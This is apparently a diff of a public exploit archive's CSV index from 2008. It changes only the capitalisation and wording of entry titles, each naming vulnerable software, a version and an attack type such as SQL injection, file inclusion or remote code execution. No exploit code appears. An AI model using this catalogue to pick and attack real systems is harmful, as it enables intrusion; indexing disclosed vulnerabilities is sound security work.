Overflow",2008-08-15,SkOd,windows,remote,21 -6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 - (adid) SQL Injection",2008-08-15,"Hussin X",php,webapps,0 +6249,platforms/php/webapps/6249.txt,"ZeeJobsite 2.0 - (adid) SQL Injection",2008-08-15,"Hussin X",php,webapps,0 6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0 6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation (PoC)",2008-08-16,g_,windows,dos,0 -6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i - .tta File Parsing Heap Overflow (PoC)",2008-08-16,g_,multiple,dos,0 +6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i - '.tta' File Parsing Heap Overflow (PoC)",2008-08-16,g_,multiple,dos,0 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)",2008-08-16,j0rgan,windows,dos,0 6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) SQL Injection",2008-08-17,"Hussin X",php,webapps,0 @@ -5872,13 +5873,13 @@ id,file,description,date,author,platform,type,port 6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6273,platforms/php/webapps/6273.txt,"SunShop 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'tr.php id' SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 -6277,platforms/php/webapps/6277.txt,"Active PHP Bookmarks 1.1.02 - SQL Injection",2008-08-19,"Hussin X",php,webapps,0 +6277,platforms/php/webapps/6277.txt,"Active PHP BookMarks 1.1.02 - SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow",2008-08-20,"Core Security",windows,remote,0 6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - Cross-Site Scripting / Blind SQL Injection",2008-08-20,Mr.SQL,php,webapps,0 6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 - (adid) SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 6281,platforms/php/webapps/6281.pl,"webEdition CMS - (we_objectID) Blind SQL Injection",2008-08-20,Lidloses_Auge,php,webapps,0 6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 - (CCMS) print.php SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps,0 -6285,platforms/php/webapps/6285.txt,"PhotoCart 3.9 - Multiple SQL Injections",2008-08-21,~!Dok_tOR!~,php,webapps,0 +6285,platforms/php/webapps/6285.txt,"Photocart 3.9 - Multiple SQL Injections",2008-08-21,~!Dok_tOR!~,php,webapps,0 6286,platforms/php/webapps/6286.txt,"BandSite CMS 1.1.4 - Download Backup / Cross-Site Scripting / Cross-Site Request Forgery",2008-08-21,SirGod,php,webapps,0 6287,platforms/php/webapps/6287.txt,"tinyCMS 1.1.2 - (templater.php) Local File Inclusion",2008-08-21,cOndemned,php,webapps,0 6288,platforms/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps,0 @@ -5891,7 +5892,7 @@ id,file,description,date,author,platform,type,port 6297,platforms/php/webapps/6297.txt,"Matterdaddy Market 1.1 - Multiple SQL Injections (1)",2008-08-25,~!Dok_tOR!~,php,webapps,0 6298,platforms/php/webapps/6298.txt,"Web Directory Script 2.0 - (name) SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0 6300,platforms/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 -6301,platforms/php/webapps/6301.txt,"ezContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 +6301,platforms/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",windows,remote,0 6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem - Authentication Bypass Exploit",2008-08-25,noensr,hardware,remote,0 @@ -5899,7 +5900,7 @@ id,file,description,date,author,platform,type,port 6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) SQL Injection",2008-08-26,cOndemned,php,webapps,0 6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - 'id' SQL Injection",2008-08-26,Kacak,php,webapps,0 -6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution Exploit",2008-08-26,mAXzA,php,webapps,0 +6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution",2008-08-26,mAXzA,php,webapps,0 6312,platforms/php/webapps/6312.txt,"k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-26,Corwin,php,webapps,0 6313,platforms/php/webapps/6313.txt,"CMME 1.12 - (Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory) Multiple Vulnerabilities",2008-08-26,SirGod,php,webapps,0 6314,platforms/php/webapps/6314.txt,"Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure",2008-08-26,SirGod,php,webapps,0 @@ -5909,7 +5910,7 @@ id,file,description,date,author,platform,type,port 6318,platforms/windows/remote/6318.html,"Ultra Office - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,windows,remote,0 6319,platforms/windows/dos/6319.html,"Ultra Office - ActiveX Control Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 6320,platforms/php/webapps/6320.txt,"phpMyRealty 1.0.9 - Multiple SQL Injections",2008-08-27,~!Dok_tOR!~,php,webapps,0 -6321,platforms/php/webapps/6321.txt,"YourOwnBux 3.1 / 3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 +6321,platforms/php/webapps/6321.txt,"Yourownbux 3.1 / 3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow Exploit",2008-08-28,Koshi,windows,local,0 6323,platforms/windows/remote/6323.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Remote Buffer Overflow Exploit",2008-08-28,spdr,windows,remote,0 6324,platforms/windows/remote/6324.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution Exploit",2008-08-28,spdr,windows,remote,0 @@ -5930,7 +5931,7 @@ id,file,description,date,author,platform,type,port 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - (item.php id) SQL Injection",2008-09-01,Stack,php,webapps,0 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 6343,platforms/php/webapps/6343.txt,"CMSbright - (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 -6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0 +6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0 6345,platforms/windows/dos/6345.html,"VMware - COM API ActiveX Remote Buffer Overflow (PoC)",2008-09-01,shinnai,windows,dos,0 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",2008-09-01,"Virangar Security",php,webapps,0 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - (artid) SQL Injection",2008-09-02,MustLive,php,webapps,0 @@ -5942,9 +5943,9 @@ id,file,description,date,author,platform,type,port 6353,platforms/windows/dos/6353.txt,"Google Chrome Browser 0.2.149.27 - Denial of Service",2008-09-03,"Rishi Narang",windows,dos,0 6354,platforms/php/webapps/6354.txt,"Spice Classifieds - (cat_path) SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 - Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0 -6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0 +6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,php,webapps,0 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 -6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 +6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php r' SQL Injection",2008-09-03,"Hussin X",php,webapps,0 6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - (adid) SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 @@ -5952,8 +5953,8 @@ id,file,description,date,author,platform,type,port 6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 - (1583) Remote Silent Crash (PoC)",2008-09-04,WHK,windows,dos,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)",2008-09-05,ShadOS,hardware,remote,0 6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote Buffer Overflow Exploit",2008-09-05,SVRT,windows,remote,0 -6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 -6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution Exploit",2008-09-05,"Khashayar Fereidani",php,webapps,0 +6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0 +6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 6372,platforms/windows/dos/6372.html,"Google Chrome Browser 0.2.149.27 - A HREF Denial of Service",2008-09-05,Shinnok,windows,dos,0 @@ -5971,15 +5972,15 @@ id,file,description,date,author,platform,type,port 6386,platforms/windows/dos/6386.html,"Google Chrome Browser 0.2.149.27 - Inspect Element Denial of Service",2008-09-05,Metacortex,windows,dos,0 6387,platforms/windows/remote/6387.rb,"CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)",2008-09-05,"Kevin Finisterre",windows,remote,2022 6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - (fage) SQL Injection",2008-09-06,ZoRLu,php,webapps,0 -6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local .m3u File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0 -6390,platforms/php/webapps/6390.txt,"IntegraMOD 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 +6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0 +6390,platforms/php/webapps/6390.txt,"Integramod 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service",2008-09-06,LiquidWorm,windows,dos,0 6392,platforms/php/webapps/6392.php,"Simple Machines Forum 1.1.5 (Windows/x86) - Admin Reset Password Exploit",2008-09-06,Raz0r,php,webapps,0 6393,platforms/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 6394,platforms/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",hardware,dos,0 6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - (cat) SQL Injection",2008-09-07,r45c4l,php,webapps,0 -6397,platforms/php/webapps/6397.txt,"Wordpress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps,0 +6397,platforms/php/webapps/6397.txt,"WordPress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps,0 6398,platforms/php/webapps/6398.txt,"E-Shop Shopping Cart Script - 'search_results.php' SQL Injection",2008-09-07,Mormoroth,php,webapps,0 6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' SQL Injection",2008-09-09,r45c4l,php,webapps,0 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",php,webapps,0 @@ -5989,17 +5990,17 @@ id,file,description,date,author,platform,type,port 6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0 6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0 6408,platforms/php/webapps/6408.txt,"CMS Buzz - 'id' SQL Injection",2008-09-09,"security fears team",php,webapps,0 -6409,platforms/php/webapps/6409.txt,"Availscript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 -6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - (fckeditor) Arbitrary File Upload",2008-09-09,Ciph3r,php,webapps,0 -6411,platforms/php/webapps/6411.txt,"Availscript Photo Album - 'pics.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 -6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script - 'viewprofile.php' SQL Injection",2008-09-09,Stack,php,webapps,0 +6409,platforms/php/webapps/6409.txt,"AvailScript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 +6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - 'FCKeditor' Arbitrary File Upload",2008-09-09,Ciph3r,php,webapps,0 +6411,platforms/php/webapps/6411.txt,"AvailScript Photo Album - 'pics.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 +6412,platforms/php/webapps/6412.txt,"AvailScript Classmate Script - 'viewprofile.php' SQL Injection",2008-09-09,Stack,php,webapps,0 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0 -6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - (Cookie) SQL Injection",2008-09-10,StAkeR,php,webapps,0 -6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script - (jid) SQL Injection (Post-Authenticated)",2008-09-10,InjEctOr5,php,webapps,0 -6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 +6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0 +6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 +6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 -6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 +6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 6422,platforms/php/webapps/6422.txt,"phpvid 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - (page) SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0 6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",windows,dos,0 @@ -6009,13 +6010,13 @@ id,file,description,date,author,platform,type,port 6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection",2008-09-11,"Khashayar Fereidani",php,webapps,0 6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - (topic) Local File Inclusion",2008-09-11,SirGod,php,webapps,0 6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 -6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 +6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",php,webapps,0 6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' SQL Injection",2008-09-11,ZoRLu,php,webapps,0 -6434,platforms/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - UNICODE Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,windows,dos,0 +6434,platforms/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,windows,dos,0 6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection",2008-09-11,"Virangar Security",php,webapps,0 6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - (cat) Blind SQL Injection",2008-09-11,Stack,php,webapps,0 6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0 -6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - (COOKIE) Authentication Bypass Exploit",2008-09-11,Tec-n0x,php,webapps,0 +6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass Exploit",2008-09-11,Tec-n0x,php,webapps,0 6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Remote File Upload",2008-09-12,Stack,php,webapps,0 6440,platforms/php/webapps/6440.pl,"PhpWebGallery 1.3.4 - Blind SQL Injection",2008-09-12,ka0x,php,webapps,0 6442,platforms/php/webapps/6442.txt,"pForum 1.30 - (showprofil.php id) SQL Injection",2008-09-12,tmh,php,webapps,0 @@ -6024,21 +6025,21 @@ id,file,description,date,author,platform,type,port 6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - (register.php) Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0 6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0 6447,platforms/php/webapps/6447.txt,"pNews 2.03 - (newsid) SQL Injection",2008-09-12,r45c4l,php,webapps,0 -6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - (fckeditor) Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0 +6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0 6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Blind SQL Injection",2008-09-13,Stack,php,webapps,0 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 -6454,platforms/windows/remote/6454.html,"Windows Media Encoder XP SP2 - wmex.dll ActiveX Buffer Overflow Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0 +6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder XP SP2 - wmex.dll ActiveX Buffer Overflow Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 -6456,platforms/php/webapps/6456.txt,"Free PHP VX GuestBook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 -6457,platforms/php/webapps/6457.txt,"Free PHP VX GuestBook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 +6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 +6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 6458,platforms/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,windows,dos,0 6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,hardware,dos,0 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite - SQL Injection",2008-09-14,~!Dok_tOR!~,php,webapps,0 -6461,platforms/php/webapps/6461.txt,"Cpanel 11.x - (Fantastico) Local File Inclusion (sec Bypass)",2008-09-14,joker_1,php,webapps,0 -6462,platforms/php/webapps/6462.pl,"CzarNews 1.20 - (Cookie) SQL Injection",2008-09-15,StAkeR,php,webapps,0 +6461,platforms/php/webapps/6461.txt,"Cpanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass)",2008-09-14,joker_1,php,webapps,0 +6462,platforms/php/webapps/6462.pl,"CzarNews 1.20 - 'cookie' SQL Injection",2008-09-15,StAkeR,php,webapps,0 6463,platforms/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel Denial of Service (Metasploit)",2008-09-15,"Javier Vicente Vallejo",windows,dos,0 6464,platforms/php/webapps/6464.txt,"CzarNews 1.20 - (Account Hijacking) SQL Injection",2008-09-15,0ut0fbound,php,webapps,0 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php c' SQL Injection",2008-09-15,JosS,php,webapps,0 @@ -6046,8 +6047,8 @@ id,file,description,date,author,platform,type,port 6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - (produid) SQL Injection",2008-09-16,SirGod,php,webapps,0 6468,platforms/php/webapps/6468.txt,"attachmax dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0 -6470,platforms/asp/webapps/6470.txt,"Hotel reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 -6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / ITunes 8.0 - Remote Off-by-One Crash Exploit",2008-09-16,securfrog,multiple,dos,0 +6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 +6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash Exploit",2008-09-16,securfrog,multiple,dos,0 6472,platforms/multiple/dos/6472.c,"Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service",2008-09-16,"Albert Sellares",multiple,dos,0 6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 6474,platforms/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",windows,dos,0 @@ -6063,12 +6064,12 @@ id,file,description,date,author,platform,type,port 6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - (random) SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 6487,platforms/php/webapps/6487.txt,"CYASK 3.x - (collect.php neturl) Local File Disclosure",2008-09-18,xy7,php,webapps,0 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php id' SQL Injection",2008-09-18,SarBoT511,php,webapps,0 -6489,platforms/php/webapps/6489.txt,"ProActive CMS - (template) Local File Inclusion",2008-09-18,r45c4l,php,webapps,0 +6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,php,webapps,0 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0 6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK ActiveX - 'NMSDVDX.dll' Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 - (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6493,platforms/linux/dos/6493.pl,"fhttpd 0.4.2 un64() - Remote Denial of Service",2008-09-19,"Jeremy Brown",linux,dos,0 -6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - (detail.php) SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 +6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 6495,platforms/php/webapps/6495.txt,"Explay CMS 2.1 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2008-09-19,hodik,php,webapps,0 6496,platforms/windows/dos/6496.c,"DESlock+ <= 3.2.7 - Local Kernel Overflow (PoC)",2008-09-20,mu-b,windows,dos,0 6497,platforms/windows/dos/6497.c,"DESlock+ <= 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)",2008-09-20,mu-b,windows,dos,0 @@ -6080,30 +6081,30 @@ id,file,description,date,author,platform,type,port 6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - (p) SQL Injection",2008-09-20,r45c4l,php,webapps,0 6504,platforms/php/webapps/6504.txt,"Oceandir 2.9 - (show_vote.php id) SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0 6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - 'humor.php id' SQL Injection",2008-09-20,r45c4l,php,webapps,0 -6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Remote Directory Traversal",2008-09-21,"Luigi Auriemma",windows,remote,0 +6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Directory Traversal",2008-09-21,"Luigi Auriemma",windows,remote,0 6507,platforms/php/webapps/6507.php,"Invision Power Board 2.3.5 - SQL Injection",2008-09-21,waraxe,php,webapps,0 6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps,0 -6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - (action) Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0 +6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps,0 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0 